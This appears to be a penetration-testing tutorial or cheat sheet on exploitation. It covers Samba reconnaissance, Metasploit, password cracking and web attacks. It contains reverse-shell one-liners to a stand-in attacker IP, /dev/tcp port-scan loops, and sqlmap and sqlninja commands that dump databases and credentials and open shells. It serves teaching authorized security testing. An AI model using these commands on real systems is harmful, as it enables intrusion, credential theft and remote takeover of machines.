Practical Security Assessment (Penetration Testing) - Exploitation

The goal of exploitation is to expose data that can be leaked and show how the overall organization can be damaged if vulnerabilities are not mitigated. A possibility of planting a backdoor and using a machine in a botnet would be a good reason for the organization to listen to you.

Samba

If you see a port 139/TCP being open, do some samba recon and figure out what version is running. -L parameter connects to the following IP. -N parameter tells that we do not have the root password.

$ nmblookup -A IP_TARGET
$ smbclient -L IP_TARGET -N
$ smbclient -L //SHARE_NAME -I IP_TARGET

Interactive shell

$ /bin/sh -i

Exploit Search

Navigate to https://www.exploit-db.com and search there, or you can type these commands in Kali:

$ searchsploit NAME
$ searchsploit samba

A shell back to you

Set up NetCat on your box that will be listening on port 5757: $ nc -l -p 5757 -vv Call a command on the target: $ /bin/bash -i > /dev/tcp/YOUR_ATTACKER_IP/5757 0<&1 2>&1

Magic Port Scan and Shell

Assuming that you are on the machine you have compromised, you can do the following to perform a port scan of any IP you want:

$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/IP_ANOTHER_TARGET/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Similarly, you can do this:

$ for ((i=0; $i < 65535; i++)); do echo > /dev/tcp/IP/$i && echo $i open; done 2>/dev/null

More old school stuff for communicating with the box over telnet:

$ telnet attacker_IP PORT1 | /bin/bash | telnet attacker_IP PORT2

Password Brute-Forcing

John The Ripper:

$ john --wordlist=rockyou.txt --rules=Jumbo hashes.txt

HashCat (probably the best one to-date) which you can learn about on their wiki:

Attack-          | Hash- |
Mode             | Type  | Example command
==================+=======+==================================================================
Wordlist         | SHA1  | hashcat -a 0 -m 100 exampleSha1.hash example.dict
Wordlist + Rules | MD5   | hashcat -a 0 -m 0 exampleMd5.hash example.dict -r rules/best64.rule
Brute-Force      | MD5   | hashcat -a 3 -m 0 exampleMd5.hash ?a?a?a?a?a?a
Combinator       | MD5   | hashcat -a 1 -m 0 exampleMd5.hash example.dict example.dict

Metasploit

Learn Metasploit

• securitytube.net --> megaprimers --> metasploit framework expert
• opensecuritytraining.info
• Metasploit-unleashed
• Metasploit cheat-sheet
• Meterpreter basics

Setting up Metasploit

First, let's set up the database:

$ service postgresql start
$ msfdb init

Now we can open metasploit, type: msfconsole We can create our own workspace for future use: workspace -a PentestClass Then, type workspace PentestClass to use the workspace. It will allow us to store all the details of the pentest in one space that can be used to refer to later on. You can do nmap scan within Metasploit:

msf> db_nmap -sS -sV -sC IP_TARGET

You can type commands like hosts and services to see the results in a nice format. You can search for exploits inside of Metasploit: search samba To use a certain exploit, type use with the full path to the exploit after seraching for it:

msf> use exploit/linux/service_name/exploit_name

Type info to see the information about the exploit. Type show options to see what options you need to set for the exploit to be initiated. RHOST is the remote host, the IP of the TARGET. Type set RHOST IP_TARGET. Now we also need to set a payload that will be sent across the wire from us to the TARGET. When the TARGET is compromised by the exploit, it will use the payload to connect back to us -- a so-called "reverse shell". Type show payloads to see all available payloads. Type set payload linux/x86/shell/reverse_tcp LHOST is the IP of our Kali box, this is the IP where the TARGET will connect back when it is compromised. LPORT the port of our Kali box to which the TARGET will try to connect. Now we are rady to exploit, type exploit

Web Pentest

Load balancing detection: lbd website.com Detecting web application firewalls: wafw00f website.com Use BeEF, Nikto, w3af, Vega, BurpSuite (free version is slow, paid is a few hundreds $$) or OWASP ZAP Proxy to do the pentest for the website.

XSS Attacks

• Excess XSS - a comprehensive tutorial on cross-site scripting
• Ultimate XSS Polyglot - a universal XSS line that will work almost everywhere
• XSS payloads
• XSS injections for all kinds of cases
• Reddit Crowdsourcing for XSS

Automated SQL Attacks

sqlmap.py

Sqlpmap is an automatic SQL injection and database takeover tool written in python.

sqlmap --wizard # will help to learn from scratch
sqlmap -u "http://...?id=5" -b # grab the banner
sqlmap -u "http://...?id=5" --current-user
sqlmap -u "http://...?id=5" --curent-db # current database
sqlmap -u "http://...?id=5" -dbs # all databases
sqlmap -u "http://...?id=5" -D DBname --tables # tables for DBname
sqlmap -u "http://...?id=5" -D DBname -T TableName --columns # columns for table TableName
sqlmap -u "http://...?id=5" -D DBname -T TableName --columns --dump # dump all the data
sqlmap -u "http://...?id=5" --users --passwords
sqlmap -u "http://...?id=5" --dbms=[database_type] # run against specific database type
sqlmap -u "http://..." --data="id=5" --os-shell # will give you a shell

sqlninja

Sqlninja is an SQL Server injection & takeover tool. Here are some of the parameters you can set:

host = target_ip
page = vulnerable_page
stringstart = id=2
lhost = our_attack_machine_ip
device = eth0
msfpath = path_to_metasploit
resolvedip = our_attack_machine_ip

Test fingerprint:

sqlninja -m t -f sqlninja.app.conf -d 1

Real fingerprint:

sqlninja -m f -f sqlninja.app.conf -d 1

Resurrect xp_cmdshell:

sqlninja -m x -f sqlninja.app.conf -d 1

Upload netcat:

sqlninja -m u -f sqlninja.app.conf -d 1

Get interactive shell:

sqlninja -m s -f sqlninja.app.conf -d 1

XXE Attacks

External XML Entity Injection (XXE) is a powerful method to exploit XML. Example is here.